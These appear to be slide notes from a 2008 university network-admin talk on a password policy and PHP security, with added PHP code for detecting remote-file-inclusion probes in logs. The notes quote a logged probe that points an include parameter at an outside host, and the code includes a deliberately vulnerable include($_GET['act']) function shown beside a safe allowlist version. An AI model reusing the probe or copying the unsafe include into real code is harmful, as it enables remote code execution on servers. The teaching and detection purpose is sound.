Password Policy and PHP Fun
Simon Bennett


                                     th December, 2012
Passwords and PHP@Netadmin 1820 March, 2008
Title of presentation [inc audience]
Password Policy

  Approved at LISC 25/02/2008
    Taken a number of years
    Final release yesterday
    Will be downloadable from the ICS pages soon
  Fairly straightforward
    Slightly controversial (lockout/strength check)
    NOT an ICS policy
    University policy
  Salient points
    Yearly password changes
    >6 chars, must include 2 digits or punctuation
    Never give out your password
    No one should ever ask for your password
    Password lock-out after 5 attempts
    We reserve the right to try and crack passwords

Fun with PHP

  Brief history
    PHP/FI 1995, 1%, Rasmus Lerdorf
    PHP/FI v2.0 1997, RIP!
    PHP 3.0 June '98
      Andi Gutmans/Zeev Suraski
      Extensive extensibility
      10% installation
    PHP 4.0
      May 2000
      Zend engine
      Improved performance & modularity
      >20% installation
    PHP 5.0
      Zend 2.0 engine

Fun with PHP

  What is PHP?
    Server-side scripting language
    I think it's a bit like C (discuss)
    Extremely powerful
    Extremely flexible
    Extremely easy to write badly!
    1 PHP page can drive a whole site
    Because it's so powerful, it can lead to massive holes in (y)our server
    Plenty of canned code out there

  Canned code
    If you use it, make sure you check whether it has been updated




Fun with PHP

  Sky receives 22800 hits per day
  500 of them are these sorts of requests
  The sort of attacks we see:

    81-86-41-163.dsl.pipex.com - - [01/Mar/2008:02:49:20 +0000] "GET /law/PhPforms/index.php?act=http://freewebs.com/diegoxfelix/ch.txt?? HTTP/1.1" 200 - "-" "Mozilla/3.0 (compatible; Indy Library)"

    Means:
      81-86-41-163.dsl.pipex.com              (client host)
      [01/Mar/2008:02:49:20 +0000]            (timestamp)
      GET                                     (method)
      /law/PhPforms/index.php?act=            (requested script and parameter)
      http://freewebs.com/diegoxfelix/ch.txt?? (remote URL supplied as the parameter value)
      HTTP/1.1                                (protocol)
      200                                     (status returned)
      Mozilla/3.0 (compatible; Indy Library)  (user agent)
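The request above is a probe for a script that passes a query parameter straight to include(). One way to spot that pattern in an access log is to parse each combined-format line and flag any request whose query string carries a URL as a parameter value. The following is an added example and not code from the presentation; the parser, the function names and the second (benign) log line are constructed for illustration, and the first line is the one shown on the slide.

```php
<?php
// Added example, not from the slides: parse Apache combined-format access-log
// lines and flag requests whose query string carries a remote URL in a
// parameter, the remote-file-inclusion probe pattern the slide shows.

// Split one combined-format line into its fields; null if it does not parse.
function parseCombinedLogLine(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) (\S+)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return [
        'host'      => $m[1],
        'time'      => $m[2],
        'method'    => $m[3],
        'path'      => $m[4],
        'protocol'  => $m[5],
        'status'    => (int) $m[6],
        'bytes'     => $m[7],
        'referer'   => $m[8],
        'userAgent' => $m[9],
    ];
}

// Names of query parameters whose value starts with a URL scheme.
function remoteUrlParameters(string $requestPath): array
{
    $query = parse_url($requestPath, PHP_URL_QUERY);
    if (!is_string($query) || $query === '') {
        return [];
    }
    parse_str($query, $params);
    $flagged = [];
    foreach ($params as $name => $value) {
        if (is_string($value) && preg_match('~^\s*(https?|ftp)://~i', $value)) {
            $flagged[] = (string) $name;
        }
    }
    return $flagged;
}

// Run the check over a batch of lines; one report row per suspicious request.
function findInclusionProbes(array $lines): array
{
    $report = [];
    foreach ($lines as $lineNo => $line) {
        $entry = parseCombinedLogLine(trim($line));
        if ($entry === null) {
            continue;                         // unparsable line: skip, do not crash
        }
        $params = remoteUrlParameters($entry['path']);
        if ($params !== []) {
            $report[] = [
                'line'   => $lineNo + 1,
                'host'   => $entry['host'],
                'time'   => $entry['time'],
                'params' => $params,
                'status' => $entry['status'],
            ];
        }
    }
    return $report;
}

// Sample input: the request from the slide plus one constructed benign request.
$sampleLog = [
    '81-86-41-163.dsl.pipex.com - - [01/Mar/2008:02:49:20 +0000] "GET /law/PhPforms/index.php?act=http://freewebs.com/diegoxfelix/ch.txt?? HTTP/1.1" 200 - "-" "Mozilla/3.0 (compatible; Indy Library)"',
    '192.0.2.10 - - [01/Mar/2008:02:50:01 +0000] "GET /law/PhPforms/index.php?act=contact HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
];

foreach (findInclusionProbes($sampleLog) as $row) {
    printf("line %d: %s at %s passed a URL via '%s' (status %d)\n",
        $row['line'], $row['host'], $row['time'], implode(',', $row['params']), $row['status']);
}
```

Only the first sample line is reported. A 200 status on such a request says nothing by itself about whether the include succeeded; the useful follow-up is to check whether the named script ever passes that parameter to include(), require() or a file function.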
Fun with PHP

  Simple rules to follow
  Just good coding practice

  Declare and initialise variables first
  Don't trust the user, validate everything
    An example, another to explain
    A bad example
    A shockingly bad example
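The two rules above, applied to the exact situation the earlier log line probes for. This is an added example, not the "bad example" from the presentation: the page names, file paths and the constant PAGES are hypothetical, and the first function shows the defect only so that the corrected version can be read against it.

```php
<?php
// Added example, not from the slides: the include-what-the-user-sent pattern
// the earlier log line is probing for, beside a version that declares and
// initialises first and validates against an allowlist. Paths are hypothetical.

// BAD: whatever arrives in ?act=... goes straight into include(). With
// allow_url_include on this fetches and runs a remote file; even with it off
// the caller can pull in any local file the web server can read.
function renderPageUnsafe(): void
{
    include $_GET['act'];
}

// GOOD: the script decides up front which pages exist; user input can only
// select one of them, never name a file.
const PAGES = [
    'home'    => 'pages/home.php',      // hypothetical paths
    'contact' => 'pages/contact.php',
];

function resolvePage(array $query, string $default = 'home'): string
{
    $act = $default;                                    // initialised before use
    if (isset($query['act']) && is_string($query['act'])) {
        if (array_key_exists($query['act'], PAGES)) {   // only allowlisted keys survive
            $act = $query['act'];
        }
    }
    return PAGES[$act];
}

function renderPageSafe(): void
{
    include resolvePage($_GET);
}

// Constructed checks: a URL as the parameter value falls back to the default
// page, and a known key resolves to its fixed path.
var_dump(resolvePage(['act' => 'http://example.invalid/probe.txt']) === 'pages/home.php');
var_dump(resolvePage(['act' => 'contact']) === 'pages/contact.php');
var_dump(resolvePage([]) === 'pages/home.php');
```

Both var_dump calls print bool(true). The point of resolvePage() is that the value from the request is used as a lookup key and never as a path fragment, so no amount of URL, "../" or null-byte decoration in the parameter changes which file is included.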


